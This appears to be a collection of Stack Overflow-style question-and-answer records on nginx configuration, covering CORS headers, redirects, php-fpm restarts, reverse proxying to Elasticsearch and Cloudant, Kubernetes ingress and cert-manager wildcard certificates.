IP address: 127.0.0.1What does it mean? Should I bother?I'm using nginx, ubuntu, gunicorn. | Django possible security attack |
You can set cors options in the server block so you don't have to repeat it for every location:server {
listen 80;
server_name $host;
proxy_pass http://localhost:9080;
add_header 'Access-Control-Allow-Origin' '*';
location = / {...Excerpt from the nginx documentation:Syntax: add_header name value [always];Default: —Context: http, server, location, if in location | NginX Newbie.I want to use NginX as a reverse proxy for websphere libery appserver on the same machine running on port 9080.I want all requests to come thru NginX and all responses to enable CORs.I got this to work but there is a lot of repetition in my nginx conf. How do I re-use CORs config across all locations?server {
listen 80;
server_name $host;
proxy_pass http://localhost:9080;
location = / {
[ CORs configuration ]
}
location /two/ {
[ CORs configuration repeated ]
}
location /three/ {
[ CORs configuration repeated again ]
}
} | Enable CORs for all upstream server locations |
You can use combination of multipleservers (including the one with wildcard subdomain). Here is a minimal example of such config:server {
listen 80;
server_name api.example.com;
add_header Content-Type text/plain;
return 200 "api";
}
server {
listen 80;
server_name *.example.com;
return 301 $scheme://example.com$request_uri;
}
server {
listen 80;
server_name example.com;
add_header Content-Type text/plain;
return 200 "main";
}You can read more about configuring server names in the docs:http://nginx.org/en/docs/http/server_names.html | I've got a domain example.com and would like to redirect all subdomains tohttp://example.com.
One exception however would be the backend-subdomain which is api.example.com.How do I pull this off using Nginx? | Redirect all but one subdomains? |
OK, I though the old fashion way was the solution :service php-fpm56 restart(actually it worked because I typed it in the SSH terminal)I was wondering what were the \xe2\x80\x8f. It appears to be some extra caracters added when I copy / pasted from skype to ssh terminal.Sosystemctl restart php-fpm56.servicewould have work if I typed it instead of copy/paste it from skype...Thanks to everyone | I have a webserver running with nginx on a CentOS.
I altered my php.ini file to increrase some limits, but when I try to restart php, I get error messages :[root@server ~]# php -v
PHP 5.6.3 (cli) (built: Nov 23 2014 15:09:34)
Copyright (c) 1997-2014 The PHP Group
Zend Engine v2.6.0, Copyright (c) 1998-2014 Zend Technologies
with the ionCube PHP Loader v4.7.1, Copyright (c) 2002-2014, by ionCube Ltd.
[root@server ~]# systemctl restart php-fpm56.service
Failed to issue method call: Unit php-fpm56.service\xe2\x80\x8f.service failed to load: No such file or directory.
[root@server ~]# systemctl restart php56.service
Failed to issue method call: Unit php56.service failed to load: No such file or directory.
[root@server ~]# service nginx reload
Redirecting to /bin/systemctl reload nginx.service
[root@server ~]# service nginx restart
Redirecting to /bin/systemctl restart nginx.service
[root@server ~]# systemctl restart php-fpm.service
Failed to issue method call: Unit php-fpm.service failed to load: No such file or directory.
[root@server ~]# systemctl restart php.service
Failed to issue method call: Unit php.service failed to load: No such file or directory.
[root@server ~]# systemctl restart php56.service
Failed to issue method call: Unit php56.service failed to load: No such file or directory.Any idea how to restart PHP please ? Thanks in advance | Reload php on CentOS |
PHP-CGI is a CGI interface. PHP-FPM is a FastCGI interface.CGI gets run once per request. FastCGI gets run once, at server startup, then enters a request loop. This makes CGI simpler, as it has no dependencies; FastCGI is faster, since it avoids any start-up times, but it's a bit more complex to set up. | When we use nginx as webserver, we also use php-fpm.
If we use apache or lighttpd, we talk php-cgi more. So the question is what relationship and difference between php-cgi and php-fpm?
Thanks very much. | What relationship between php-cgi and php-fpm? |
Seems likeupstreamand a differentkeepaliveis necessary for the ES backend to work properly, I finally had it working using the following configuration :upstream elasticsearch {
server 127.0.0.1:9200;
keepalive 64;
}
server {
listen 8080;
server_name myserver.com;
error_log /var/log/nginx/elasticsearch.proxy.error.log;
access_log off;
location / {
# Deny Nodes Shutdown API
if ($request_filename ~ "_shutdown") {
return 403;
break;
}
# Pass requests to ElasticSearch
proxy_pass http://elasticsearch;
proxy_redirect off;
proxy_http_version 1.1;
proxy_set_header Connection "";
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header Host $http_host;
# For CORS Ajax
proxy_pass_header Access-Control-Allow-Origin;
proxy_pass_header Access-Control-Allow-Methods;
proxy_hide_header Access-Control-Allow-Headers;
add_header Access-Control-Allow-Headers 'X-Requested-With, Content-Type';
add_header Access-Control-Allow-Credentials true;
}
} | I've set up an Elasticsearch server with Kibana to gather some logs.Elasticsearch is behind a reverse proxy by Nginx, here is the conf :server {
listen 8080;
server_name myserver.com;
error_log /var/log/nginx/elasticsearch.proxy.error.log;
access_log off;
location / {
# Deny Nodes Shutdown API
if ($request_filename ~ "_shutdown") {
return 403;
break;
}
# Pass requests to ElasticSearch
proxy_pass http://localhost:9200;
proxy_redirect off;
proxy_http_version 1.1;
proxy_set_header Connection "";
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header Host $http_host;
# For CORS Ajax
proxy_pass_header Access-Control-Allow-Origin;
proxy_pass_header Access-Control-Allow-Methods;
proxy_hide_header Access-Control-Allow-Headers;
add_header Access-Control-Allow-Headers 'X-Requested-With, Content-Type';
add_header Access-Control-Allow-Credentials true;
}
}Everything works well, I cancurl -XGET "myserver.com:8080"to check, and my logs come in.But every minute or so, in the nginx error logs, I get that :2014/05/28 12:55:45 [error] 27007#0: *396 connect() failed (111: Connection refused) while connecting to upstream, client: [REDACTED_IP], server: myserver.com, request: "POST /_bulk?replication=sync HTTP/1.1", upstream: "http://[::1]:9200/_bulk?replication=sync", host: "myserver.com"I can't figure out what it is, is there any problem in the conf that would prevent some_bulkrequests to come through ? | Elasticsearch : Connection refused while connecting to upstream |
Only application could check if user is logged in or not, but you could useX-Accel-Redirectheader to make nginx serve one file or another.Some pseudocode:if (user.isLoggedIn) {
response.setHeader("X-Accel-Redirect", "/app.html");
} else {
response.setHeader("X-Accel-Redirect", "/index.html");
}
response.end();Also you need to pass request to/to application.location = / {
# copy from location /api
} | I am using Node.js with nginx. My Node app is built on express and uses passport for authentication and is using sessions. My Node app is responding to JSON requests on all/apiurls, and nginx is serving static files from a public directory.I want nginx to serveindex.htmlat/when the user is not logged in, and serveapp.htmlat/when the user is logged in.Here's my current nginx config.upstream app_upstream {
server 127.0.0.1:3000;
keepalive 64;
}
server {
listen 0.0.0.0:80;
server_name app.com default;
access_log /var/log/nginx/app.com.access.log;
error_log /var/log/nginx/app.com.error.log debug;
root /home/app/app/public;
location /api {
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarder-For $proxy_add_x_forwarded_for;
proxy_set_header Host $http_host;
proxy_set_header X-NginX-Proxy true;
proxy_cache_bypass 1;
proxy_no_cache 1;
expires off;
if_modified_since off;
add_header Last-Modified "";
proxy_pass http://app_upstream;
proxy_redirect off;
}
location / {
access_log off;
expires max;
}
}How do I get nginx to determine if a user is logged in or not, and then serve a different file accordingly? I've noticed that express creates a cookie calledconnect.sid, but that doesn't seem to go away when the user logs out. | Nginx serve different files based on user login? |
This worked for me. This is assuming you only have a index.html,htm and the other urls are missing the physical file on disk.server {
listen 80;
server_name www.example.com example.com;
root /u/apps/example/www;
index index.html;
location / {
if (!-e $request_filename) {
rewrite ^ / permanent;
}
}
} | I'm shutting down a site and I need to 301 redirect all pages to the home page where I have a message saying that the site is being closed down.Basically anyhttp://example.com/anyfolder-> 301 tohttp://www.example.comI have the following but this results in a redirection loop.location ~ ^/([A-z]+) { rewrite ^ / permanent; }What is the proper way to do this in nginx? | Nginx 301 Redirect all non home page urls to home page |
Sorry to disappoint, it is not possible, not with today nginx. It was said more than once via different forums and mailing lists that nginx config doesn't support macros or conditional includes. Which is what you are after. The config, except for some minimal things is pretty static in nginx. you can't "program" it as you did on apache. I'll be happy to learn I am wrong, but ATM we all resort to hacks. Depends on your environment but if you control the servers, you can put the geoip into a separate directory and use globbing to include. That is, don't put any file there on the servers without geoip and put there a config file with geoip config if the module is present. If this is not an option you probably have to modify the init script to do the checks and adapt the config.Example:assume you have a directory:/etc/nginx/geoip/on the server with geoip module available there is a file inside the directory:default.http.scopethe content of the file:geoip_country /usr/share/GeoIP/GeoIP.daton the servers without geoip module, the directory is empty.In the nginx config at the http scope you can safely do:include /etc/nginx/geoip/*.http.scopeon both servers and only the one with the files that match the pattern will try to configure geoip. | Is there any alternative to the ifmodule directive in apache?I'm trying to create a generic nginx.conf file for our company, but some sites have special requirements as having the geoip module. In these sites, I need to declare a directive in nginx.conf, http section, to define the country database.The problem is that in other servers, that module is not compilled, so I need a caveat to load it only if that module is installed.Any idea? Thanks in advance! | Apply directive in nginx.conf only if module is installed (apache ifmodule alternative) |
You should split your server block. See:http://wiki.nginx.org/Pitfallsserver {
listen 80;
server_name name1.com;
location = / {
# no rewrite here
}
}
server {
listen 80;
server_name name2.com;
location = / {
# your rewrite here
}
} | I need to rewrite url when users access specific domain with root (aka /) url.
So far I have:server {
listen 80;
server_name name1.com name2.com;
location = / {
# Well, I need this only for NAME2.COM (it should not rewrite NAME1.COM)
rewrite name2.com/users/sign_in
}
}How do rewrite only for NAME2.COM. Sometimes NGINX syntax makes my stack overflow. Please help. | NGINX rewrite url if specific domain and specific url |
I found the issue. The innocuous looking rewrite rule as the first line rewrites the $request_uri and changes the $uri variable as part of request fulfillment. $request_uri is not changed by rewrite. So when I included that variable in the proxy_pass location, I was not properly including the edited url with the /couchdb/ removed.Changing the proxy_pass line to:proxy_pass http://myusername.cloudant.com$uri;Now works without issue. This was not an SSL problem nor a problem with Basic Authentication nor other http header issue nor a problem with Cloudant. This was all related to the URI I was forwarding my request to. | I'd like to expose some of Cloudant's couchdb features through NGINX running on my domain by using proxy_pass. So far I have worked out a few kinks (noted below), but I am stuck as far as authorization. Does anyone have any tips?location /couchdb {
rewrite /couchdb/(.*) /$1 break; #chop off start of this url
proxy_redirect off
proxy_buffering off;
proxy_set_header Host myusername.cloudant.com;
# cannot use $host! must specify my vhost on cloudant
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header Authorization "Basic base64-encode(username:password)";
proxy_pass http://myusername.cloudant.com$request_uri;
# must use a variable in this url so that the domain is looked up late.
# otherwise nginx will fail to start about half the time because of resolver issues
# (unknown why though)
}Using this setup, I can successfully proxy to Cloudant, but I always receive a forbidden response. For instance, this request:http://mydomain/couchdb/my-cloudant-dbreturns{"error":"forbidden", "reason":"_reader access is required for this request"}Thanks for any help. | NGINX Proxy to Cloudant |
The correct way to increase the limit is by setting worker_rlimit_nofile. | How can I increase the file descriptors limit in nginx?There are several ways to increase file descriptors:Edit/etc/security/limits.confand set nofile soft and hard limits for the nginx user.Set $ULIMIT in/etc/default/nginx. The nginxinit.dscript set ulimit $ULIMIThttps://gist.github.com/aganov/1121022#file-nginx-L43Setworker_rlimit_nofileinnginx.confhttp://wiki.nginx.org/NginxHttpMainModule#worker_rlimit_nofileDoes setting limits inlimits.confaffect nginx when started usinginit.dscript on boot?Do I have to use ulimit $ULIMIT in the init script or canworker_rlimit_nofilebe used instead?When using ulimit $ULIMIT in the init script, do I still need to useworker_rlimit_nofileto set limits for each worker?Thanks | Nginx File descriptor limit |
You could just repeat thelocation ~ \.php$block inside the/administration/block.As a workaround, I've also used this setup with success, which saves me from repeating the PHP configuration over and over in complex scenarios.location ^~ /administration/ {
auth_basic "Restricted Area";
auth_basic_user_file /var/www/myproject/sec/htpasswd;
location ~ \.php$ {
try_files /dummy/$uri @php;
}
}
location ~ \.php$ {
try_files /dummy/$uri @php;
}
location @php {
fastcgi_pass unix:/var/run/php5-fpm.sock;
fastcgi_index index.php;
include fastcgi_params;
}It basically uses anamed locationfor the PHP configuration. Unfortunately you can not use such a location everywhere. But it works withtry_files. You should make sure, that there's no directory/dummy/on your server. | I have a problem with subfolders in a basic auth procted folder. In the protected folder i have a folder named phpmyadmin, which contains phpmyadmin. Im not able to run phpmyadmin, when basic is activated. Whenn i call the the folder, i get a save-as dialog (type: application/octet-stream (18,3 KB)).Here the important parts of mysites-available/defaultlocation ^~ /administration/ {
auth_basic "Restricted Area";
auth_basic_user_file /var/www/myproject/sec/htpasswd;
}
location ~ \.php$ {
fastcgi_pass unix:/var/run/php5-fpm.sock;
fastcgi_index index.php;
include fastcgi_params;
}Any ideas, how i can run php in basic-auth protected subfolders? | Nginx Basic Auth and subfolders |
Remove the "^". Fromserver_name ^~(?[^\.]*)\.(?[^\.]*)$;Toserver_name ~(?[^\.]*)\.(?[^\.]*)$;Or switch "^" and "~". The letter "~" must be the first one.server_name ~^(?[^\.]*)\.(?[^\.]*)$; | Is there anybody who tell me why i still got error like this?Restarting nginx: [emerg]: unknown "domain_name" variable
configuration file /etc/nginx/nginx.conf test failedthe part of code where is variable looks like:server {
# if you're running multiple servers, instead of "default" you should
# put your main domain name here
listen 80 default;
# you could put a list of other domain names this application answers
server_name ^~(?[^\.]*)\.(?[^\.]*)$;
# root defined by domain
root /home/deployer/apps/$domain_name/current/;
# access && error && rewrite log
access_log /var/log/nginx/access.log;
error_log /var/log/nginx/error.log;
rewrite_log on;
# default location
location / {
... | Nginx server_name regexp not working as variable |
This is not just a urls.py thing, it's normal workflow for running a wsgi or fastcgi app. The module is in memory, and it doesn't get reloaded from disk until you tell the server that it's changed.As perDjango's FastCGI docs:If you change any Python code on your site, you'll need to tell FastCGI the code has changed. But there's no need to restart Apache in this case. Rather, just reupload mysite.fcgi, or edit the file, so that the timestamp on the file will change. When Apache sees the file has been updated, it will restart your Django application for you.If you have access to a command shell on a Unix system, you can accomplish this easily by using the touch command:touch mysite.fcgiFor development, in most cases you can use thedjango development server, which watches for code changes and restarts when it sees something change. | I'm usingdjangoonnginxwithFastCGIand i have a problem withurls.py. According tothis question, django caches url.py file and i'm - just like above question's author - not able to modify my URLs definitions.My question is - is there any way to clear url cache in django/nginx/fcgi without server restart (which not helps anyway)? | Refresh urls.py cache in django |
hmm of course it's the users fault. I had a wrong references to the socket in the site-available conf and an endless loop was the result. I fixed it in the gist. | I am trying to setup Nginx + Unicorn + Rails 3. Nginx will also serve some static and php projects. However when I open the site I always see a400 Bad Request
Request Header Or Cookie Too Largeerror page. Nothing in the access nor error logs./etc/nginxnginx.confhttps://gist.github.com/1117152php.confhttps://gist.github.com/1117154drop.confhttps://gist.github.com/1117158/etc/nginx/sites-enabledhttps://gist.github.com/1117161I am pretty stuck here because I don't see anything in logs. | Nginx Request header Or Cookie Too Large |
Apparently it is bytes per second.Source | These are the docs for X-Accel-Limit-Rate:Sets the rate limit for this single request. Off means unlimited.Not much there. Most of the examples (I've found only two or three) I've seen set the value of X-Accel-Limit-Rate to 1024. This is obviously 1024 bytes, but per what? Or is that a total of some sort?Without knowing what the value means it's difficult to know what it'sreallydoing. | What does X-Accel-Limit-Rate really do in NginX? |
The Domain Auth Plugin uses therequest.getClientAddr()method to determine the IP address of the client, which in turn uses both theREMOTE_ADDRvariable and theX-FORWARDED-FORheader.Normally, you cannot rely on theX-FORWARDED-FORheader, seeing as just about anyone could have set it. But you can configure Zope to trust that header from a given set of trusted proxies. Using the list of trusted proxies, theREMOTE_ADDRIP address will be replaced with the next address given in theX-FORWARDED-FORheader, until you run out of addresses to trust. The last IP address found is then the new client address. This allows you to chain a set of proxies and still be able to trust you get the correct client address to base your roles on.To configure Zope to trust a proxy'sX-FORWARDED-FORheader, set thetrusted-proxyconfiguration parameter in thezope.conffile. If your nginx server runs on the same host, just set it to localhost:trusted-proxy 127.0.0.1You specify more than one name by adding multiple entries:trusted-proxy 127.0.0.1
trusted-proxy loadbalancer.localnettrusted-proxytakes both ip addresses and hostnames. | I'm trying to use the Domain Auth Plugin to assign the Membership role to site visitors based on their IP address.I can configure the plugin OK, but it occurs to me all the requests will be coming from localhost and not the "real" IP address.In this case I'm using NGINX, so I tried setting X-Real-IP to $remote_addr via proxy_set_header (e.g.http://wiki.nginx.org/HttpProxyModule), but as far as I can tell that just makes the IP address available in the header.How do I make the requests sent from NGINX to Plone appear to be originating from the remote IP address?I'm using NGINX but I'm open to answers that apply to Apache too. | How do I configure my web server to work with the PluggableAuthService's Domain Auth Plugin? |
Compojure is written on ring and ring has middleware :)you would write a middleware calledwith-uuidthat adds the UUID to the request map on the way in and to the reply on the way out. | We are running nginx as a reverse proxy that forwards requests to a Clojure application running Compojure, a library that wraps around Jetty and provides our application with the ability to service web requests.We currently capture logs generated by both nginx and the Clojure application (via log4j to syslog). We are unable, however, to match an entry in the nginx log to an entry in the syslog output of the Clojure application.We need to figure out a way to modify the request sent upstream to the Clojure app to include some kind of ID. This could be an integer, UUID, whatever.Do you have any suggestions as to how best to accomplish this?Thanks for your help! | add unique id to requests forwarded from nginx reverse proxy |
Problem solved, I am a spanner.I had 'passenger_enabled on;' inside 'location /' not 'server'. I hereby hand in my coding hands. | Essentially, my route is working perfectly, Passenger seems to be loading - all is hunky-dory. Except that nothing Railsy happens. Here's my Nginx log from starting the server to the first request (ignore the different domain/route - it's because I haven't moved the new domain over yet, and it's returning a 403 error because there's no index file in the public folder):[ pid=24559 file=ext/nginx/HelperServer.cpp:826 time=2009-11-10 00:49:13.227 ]:
Passenger helper server started on PID 24559
[ pid=24559 file=ext/nginx/HelperServer.cpp:831 time=2009-11-10 00:49:13.227 ]:
Password received.
2009/11/10 00:49:53 [error] 24578#0: *1 directory index of "/var/www/***/current/public/" is forbidden, client: 188.221.195.27, server: ***, request: "GET / HTTP/1.1", host: "***"
2009/11/10 00:49:54 [error] 24578#0: *1 open() "/var/www/***/current/public/favicon.ico" failed (2: No such file or directory), client: 188.221.195.27, server: ***, request: "GET /favicon.ico HTTP/1.1", host: "***", referrer: "***"Someone on the RubyOnRails IRC channel suggested that it might be a webserver permissions problem. I had a suspicion that it might be a filesystem permission problem, but then Nginx runs as www-data and Passenger as root.I can load static files from within the public directory fine, but no Rails application is being launched. Does anyone have an idea? My head is gradually melting away figuring this one out!Edit: Here's the vhost file:server {
listen 80;
server_name ***;
passenger_enabled on;
location / {
root /var/www/***/current/public;
index index.html index.htm;
}
#error_page 404 /404.html;
# redirect server error pages to the static page /50x.html
#
error_page 500 502 503 504 /50x.html;
location = /50x.html {
root html;
}
} | Passenger, Nginx, and Capistrano - Passenger not launching Rails app at all |
I have come across this issue a while back, and I think the issue is with the headers.
In the MDN docs, it is statedherethat other than for the simple requests, we'll get preflighted requests withOPTIONSmethod. There are 3 main headers that we need to send in response in your caseAccess-Control-Allow-Origin: http://localhost:1337
Access-Control-Allow-Methods: POST, GET, OPTIONS
Access-Control-Allow-Headers: Content-TypeFrom the looks of it you have configured the first header and you should be seeing it in the network tab too, and since the error is about missing allow headers, you need to addAccess-Control-Allow-Methodsheader
to your nginx fileadd_header 'Access-Control-Allow-Methods' 'GET, POST, OPTIONS';Seeing your network tab on the requested headers will give more context here, generally you should be seeingAccess-Control-Request-MethodandAccess-Control-Request-Headersheaders in theOPTIONSrequest. If there are some headers that you aren't allowing, please write an nginx rule for the same. You can look intothis solutionfor more reference | I have a question about cors implementation in django.
Having a problem with setting the correct cors values.
My deployment is on docker.
I have a deployed 3 containers:backend: Django + DRF as backend (expose 8000 port)Nginxto server my backend (use exposed 8000 port and set it to 1338)frontendReact app used with nginx (uses port 1337)Everything is on localhost.
I use axios from frontend to call get/post requests. (I call to 1338 port then I think it is redirected to internal service on 8000 port)
For backend I had to install django-cors-headers package to work with CORS.
I think I set up it correctly. But there are scenarios where it does not work.In settings.pyINSTALLED_APPS = [
...
"corsheaders",
]
...
MIDDLEWARE = [
...
"corsheaders.middleware.CorsMiddleware",
"django.middleware.common.CommonMiddleware",
...
]Nginx.conf for nginx image:upstream backend {
server backend:8000;
}
server {
listen 80;
add_header Access-Control-Allow-Origin *;
location / {
proxy_pass http://backend;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header Host $host:1337;
proxy_redirect off;
}
location /static/ {
alias /home/app/web/staticfiles/;
}
}First scenarioIn settings.pyCORS_ALLOW_ALL_ORIGINS = TrueNo get/post requests work. Get message:CORS Multiple Origin Not AllowedSecond scenarioIn settings.pyCORS_ALLOWED_ORIGINS = ["http://localhost:1337"]Works with get requests, but does not work with post requests.For post requests:options with error: CORS Missing Allow Headerpost with error: NS_ERROR_DOM_BAD_URIIt works if I am not using nginx for backend.Adding request headers as requested in the comment.I am not sure what else could I add here. So my deployed project is here (it also is easy to launch if you have docker on your machine:https://gitlab.com/k.impolevicius/app-001 | Cors problem with nginx/django from react app on docker |
NOTE: No there is no extra addon/extension in PHP for str_replace.
str_replace() is built in string function on PHP 4, PHP 5, PHP 7, PHP 8.In your code, there can be 2 possible errors. As your code is running local and your files have write permissions.The First point is - your/config/constants.phpfile is too big that's why the foreach loop is taken too much time and exit it but for this PHP should throw an error.The Second point is - You are using laravel config and your$searchforvariable coming frombootstrap/cache/config.php. And you are replacing the value with the config cache value but maybe your/config/constants.phpdoesn't have this exact key-value or have some spaces between there. I think you got my point. | I am developing a laravel ride sharing applicaiton and for the settings data I used a config files. To change any value usign file file_get_contents after that with str_replace and file_put_contents for updating the value.
here is some code example:$config = base_path() . '/config/constants.php';
$file = file_get_contents($config);
$change_content = $file;
foreach ($request->all() as $key => $value) {
$value = (trim($value) == 'on') ? '1' : trim($value);
$searchfor = config('constants.' . $key);
if ($value != $searchfor) {
$search_text = "'" . $key . "' => '" . $searchfor . "'";
$value_text = "'" . $key . "' => '" . $value . "'";
$change_content = str_replace($search_text, $value_text, $change_content);
}
file_put_contents($config, $change_content);
}But the $change_content doesn't return any value in the AWS serverNOTE: This is working in my local machine also in Cpanel but in AWS ec2 not working. I am using php7.4, Nginx in Ubuntu 20.04. Same configuration for Cpanel, local, and AWS ec2.Can anyone tell me that is there any extra configuration for str_replcae?? | str_replace() is not working in aws server returning empty string but working on cpanel and locally |
Generating wildcard certificate withcert-manager(letsencrypt) requires the usage ofDNS-01challenge instead ofHTTP-01used in the link from the question:Does Let’s Encrypt issue wildcard certificates?Yes. Wildcard issuance must be done via ACMEv2 using the DNS-01 challenge. Seethis postfor more technical information.There is a documentation about generating thewildcardcertificate withcert-manager:Cert-manager.io: Docs: Configuration: ACME: DNS-01From the perspective of DigialOcean, there is a guide specifically targeted at it:This provider uses a KubernetesSecretresource to work. In the following
example, theSecretwill have to be nameddigitalocean-dnsand have a
sub-keyaccess-tokenwith the token in it. For example:apiVersion: v1
kind: Secret
metadata:
name: digitalocean-dns
namespace: cert-manager
data:
# insert your DO access token here
access-token: "base64 encoded access-token here"The access token must have write access.To create a Personal Access Token, seeDigitalOcean documentation.Handy direct link:https://cloud.digitalocean.com/account/api/tokens/newTo encode your access token into base64, you can use the followingecho -n 'your-access-token' | base64 -w 0apiVersion: cert-manager.io/v1
kind: Issuer
metadata:
name: example-issuer
spec:
acme:
...
solvers:
- dns01:
digitalocean:
tokenSecretRef:
name: digitalocean-dns
key: access-token--Cert-manager.io: Docs: Configuration: ACME: DNS-01: DigitaloceanI'd reckon this additional resources could also help:Stackoverflow.com: Questions: Wilcard SSL certificate with subdomain redirect in KubernetesItnext.io: Using wildcard certificates with cert-manager in Kubernetes | I followed this DigitalOcean guidehttps://www.digitalocean.com/community/tutorials/how-to-set-up-an-nginx-ingress-with-cert-manager-on-digitalocean-kubernetes, and I came across something quite strange. When in the hostnames I set a wildcard, thenletsencryptfails in issuing a new certificate. While when I only set defined sub-domains, then it works perfectly.This is my "working" configuration for the domain and its api (and this one works perfectly):apiVersion: networking.k8s.io/v1beta1
kind: Ingress
metadata:
name: my-ingress
annotations:
cert-manager.io/cluster-issuer: "letsencrypt-staging"
spec:
tls:
- hosts:
- example.com
- api.example.com
secretName: my-tls
rules:
- host: example.com
http:
paths:
- backend:
serviceName: example-frontend
servicePort: 80
- host: api.example.com
http:
paths:
- backend:
serviceName: example-api
servicePort: 80And this is, instead, the wildcard certificate I'm trying to issue, but that fails to do leaving the message "Issuing".apiVersion: networking.k8s.io/v1beta1
kind: Ingress
metadata:
name: my-ingress
annotations:
cert-manager.io/cluster-issuer: "letsencrypt-staging"
spec:
tls:
- hosts:
- example.com
- *.example.com
secretName: my-tls
rules:
- host: example.com
http:
paths:
- backend:
serviceName: example-frontend
servicePort: 80
- host: api.example.com
http:
paths:
- backend:
serviceName: example-api
servicePort: 80The only difference is the second line of the hosts. Is there a trivial well known solution I am not aware of? I am new to Kubernetes, but not to DevOps. | Generate wildcard certificate on Kubernetes cluster with DigitalOcean for my Nginx-Ingress |
I have no idea but it works after I've copied nginx.conf and mime.types inside /etc/nginx fromthis link. Thank you @Daniel Mesa | Right after installing Nginx on Ubuntu, it's not starting. I've no idea what's happening. I tried created nginx.conf by myself but no changed happened● nginx.service - A high performance web server and a reverse proxy server
Loaded: loaded (/lib/systemd/system/nginx.service; enabled; vendor preset: enabled)
Active: failed (Result: exit-code) since Fri 2021-01-08 15:12:18 UTC; 1min 49s ago
Docs: man:nginx(8)
Jan 08 15:12:18 root systemd[1]: Starting A high performance web server and a reverse proxy server...
Jan 08 15:12:18 root nginx[3367]: nginx: [emerg] open() "/etc/nginx/nginx.conf" failed (2: No such file or d
Jan 08 15:12:18 root nginx[3367]: nginx: configuration file /etc/nginx/nginx.conf test failed
Jan 08 15:12:18 root systemd[1]: nginx.service: Control process exited, code=exited status=1
Jan 08 15:12:18 root systemd[1]: nginx.service: Failed with result 'exit-code'.
Jan 08 15:12:18 root systemd[1]: Failed to start A high performance web server and a reverse proxy server. | Nginx not starting after installed [emerg] open() "/etc/nginx/nginx.conf" failed (2: No such file |
I also understand that it's impossible to have 2 Ingress serving External HTTP requestI am not sure where you've found this but you totally can do this.You should be able to create two separate ingress objects like following:apiVersion: networking.k8s.io/v1beta1
kind: Ingress
metadata:
name: frontdoor-bar
namespace: myapps
annotations:
kubernetes.io/ingress.class: nginx
cert-manager.io/cluster-issuer: letsencrypt-prod
nginx.ingress.kubernetes.io/rewrite-target: /$1
nginx.ingress.kubernetes.io/use-regex: "true"
nginx.ingress.kubernetes.io/affinity: "cookie"
nginx.ingress.kubernetes.io/session-cookie-name: "PHPSESSID"
nginx.ingress.kubernetes.io/session-cookie-expires: "172800"
nginx.ingress.kubernetes.io/session-cookie-max-age: "172800"
spec:
type: LoadBalancer
tls:
- hosts:
- bar.foo.dev
secretName: tls-secret-bar
rules:
- host: bar.foo.dev
http:
paths:
- backend:
serviceName: barfoo
servicePort: 80
path: /(.*)
---
apiVersion: networking.k8s.io/v1beta1
kind: Ingress
metadata:
name: frontdoor-foo
namespace: myapps
annotations:
kubernetes.io/ingress.class: nginx
cert-manager.io/cluster-issuer: letsencrypt-prod
nginx.ingress.kubernetes.io/backend-protocol: "FCGI"
nginx.ingress.kubernetes.io/fastcgi-index: "index.php"
nginx.ingress.kubernetes.io/fastcgi-params-configmap: "example-cm"
spec:
type: LoadBalancer
tls:
- hosts:
- foo.bar.dev
secretName: tls-secret-foo
rules:
- host: foo.bar.dev
http:
paths:
- backend:
serviceName: foobar
servicePort: 9000
path: /(.*)This is a completely valid ingress configuration, and most probably the only valid one that will solve your problem.Each ingress object configures one domain. | I have different applications running in the same Kubernetes Cluster.I would like multiple domains to access my Kubernetes Cluster and be redirected depending the domain.
For each domain I would like different annotations/configuration.Without the annotations I have an ingress deployment such as:apiVersion: networking.k8s.io/v1beta1
kind: Ingress
metadata:
name: frontdoor
namespace: myapps
annotations:
kubernetes.io/ingress.class: nginx
cert-manager.io/cluster-issuer: letsencrypt-prod
spec:
type: LoadBalancer
tls:
- hosts:
- foo.bar.dev
- bar.foo.dev
secretName: tls-secret
rules:
- host: foo.bar.dev
http:
paths:
- backend:
serviceName: foobar
servicePort: 9000
path: /(.*)
- host: bar.foo.dev
http:
paths:
- backend:
serviceName: varfoo
servicePort: 80
path: /(.*)But They need to have multiple configuration, for example, one need to have the following annotationnginx.ingress.kubernetes.io/rewrite-target: /$1
nginx.ingress.kubernetes.io/use-regex: "true"
nginx.ingress.kubernetes.io/affinity: "cookie"
nginx.ingress.kubernetes.io/session-cookie-name: "PHPSESSID"
nginx.ingress.kubernetes.io/session-cookie-expires: "172800"
nginx.ingress.kubernetes.io/session-cookie-max-age: "172800"And another would have this onenginx.ingress.kubernetes.io/backend-protocol: "FCGI"
nginx.ingress.kubernetes.io/fastcgi-index: "index.php"
nginx.ingress.kubernetes.io/fastcgi-params-configmap: "example-cm"Those configurations are not compatible, and I can't find a way to specify a configuration by host.I also understand that it's impossible to have 2 Ingress serving External HTTP request.So what am I not understanding / doing wrong ? | Kubernetes - multiple configuration in one Ingress |
I found the answer myself. The following snippet shows as to how to do it with the help ofhttp-streaming libraryof videojs -
| I am using videojs in live streaming environment and using nginx secure URLs to protect the stream. See here for the details -https://www.nginx.com/blog/securing-urls-secure-link-module-nginx-plus/The algorithm works fine and the player is able to detect when the live.m3u8 file becomes available. However, when playing the stream, I just get a spinning wheel. On the JS console, I see that the sub-playlist e.g. live_109.m3u8 URL does not have the required md5 hash and expiry timestamp and hence nginx is returning 403.The stream URL format is -https://example.com/video/live.m3u8?md5=xznbbmbbbbbxncb&expire=123456788When I play the stream, the console suggest that the player is now trying to callhttps://example.com/video/live_109.m3u8And since without the md5 and expiry parameters, nginx will send 403, I am getting that.Adding?md5=xznbbmbbbbbxncb&expire=123456788works perfect with the live_109.m3u8 also.I am sure the same problem will be with the individual segments (.ts files)My question here is that how can I append?md5=xznbbmbbbbbxncb&expire=123456788to every .m3u8 and .ts file being called from the page. | Appending paramaters to each m3u8 and ts file while playing live stream |
Feeding from Ivan's response and finalizing my solution as:server {
listen 443 ssl;
server_name app1.domain.com;
location / {
sub_filter '/myapp/' '/'; # rewrites HTML strings to remove context
sub_filter_once off; # ensures it loops through the whole HTML (required)
proxy_pass http://localhost:8080/myapp/;
}
